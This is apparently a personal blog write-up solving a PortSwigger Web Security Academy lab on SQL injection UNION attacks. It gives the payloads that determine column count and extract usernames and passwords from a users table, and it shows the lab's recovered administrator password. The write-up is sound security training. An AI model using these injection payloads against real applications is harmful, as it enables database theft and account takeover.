Lab: SQL injection UNION attack, retrieving data from other tables

Posted on 2023-04-25 | Post modified | In Security/Practice/Portswigger Web Security Academy/SQL |

Description: This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
Hint: The database contains a different table called users, with columns called username and password. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Using all technique we learned before According to union-based technique we learned before, we can consider there’re 2 columns in this database and both of them are text strings Payload: ?category=Lifestyle' UNION SELECT 'Title name','Post content'--
Find the detailed info in users table Payload: ?category=Lifestyle' UNION SELECT username, password FROM users--
Login as administrator Username: administrator Password: 5kg73b7jinl9plif82d3 :::spoiler Success Screenshot :::

Reference

Post author: SBK6401
Post link: https://bernie6401.github.io/security/practice/portswigger%20web%20security%20academy/sql/2023/04/25/Lab_-SQL-injection-UNION-attack,-retrieving-data-from-other-tables/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.